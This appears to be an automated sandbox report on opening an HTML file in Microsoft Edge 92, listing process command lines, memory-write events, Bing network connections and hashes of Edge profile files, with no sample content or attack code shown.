PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2560 wrote to memory of 3812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ba2246f8,0x7ff8ba224708,0x7ff8ba224718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3128 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3c6e13dc1762aa873320bed152204f3c
SHA1 38df427d38ca5ce6ce203490a9fb8461c7444e12
SHA256 5c441148843b7c8dbff4c4a72962a532aaf0bdd484d07a03dd9a32fd461b1371
SHA512 133054cb042e11013bfdad1bd11e3407d08cf26a66d0743bea9708d261aa904a1047bb0097b187ecf8436cb6cff3bec28c89e435862cad0e0fa264799556b70c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f5da507c2059b715761792e7106405f0
SHA1 a277fd608467c5a666cf4a4a3e16823b93c6777f
SHA256 8c1d99de087ac5f2e7b2afce66eff36a646bef46800c0c1d7737d6f0df74b7e8
SHA512 01c92729dd8061aa122b116a674c73bb78016f66d2cb8f7fb64907352758a825e87a1e345334386440699d2a6d1e17baccb400c5aee151eb64e64019cbebb870

\??\pipe\LOCAL\crashpad_2560_IPXIRUHBMCTZIZTP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7b1714b9cd75ac382f61a090f333f520
SHA1 7191b8e8f7cf5fecd33489dc7119bef1a833d6c1
SHA256 0505e56cb286f6371e3c3f80aa45a124cec3ecce0c3a31248d8deee8edefec88
SHA512 4eca557fb1178034818a1ec46e681b3936cc0edde93b36efdde813f4ab1f0ab74093388dba5d789d394e13a62b07c159d04fd89488951bcce35e36ae738b1c33

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1d4b5d6d4b2cc77c1748d5028b40f9fc
SHA1 9f3379d6162b95d74557d281bb403bb4a7ea17c5
SHA256 7e5a7ccafb2a041d8b444184799beec08bda9ab2b778c3df42cea52d85155ed9
SHA512 5899b9d61e04bab124f530af472f3b3b864b8c170e9a9a3d54d88ab77b85ae6b5bdef54c6f5cf03a839cd872359de80e11b9a6e3ca5b1f4b986b53cf9138a681

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8e07abdf4a3961e1baff4397a3ac770d
SHA1 743cd84f84cfe0bc6d8f2a620be541ead4ffc02e
SHA256 855a90255da0a76af0fdcee2c63ad9cabe22a84c2d983fb7cf688869538a96dc
SHA512 5d2ddcbf597eac6c8a2eca504e16084c3b86b597d83eebeb74f22c6fe9abf56973f9e2370c8daa4056077d774b9fff2ba316a778a4a7146d38da70ce7c20656a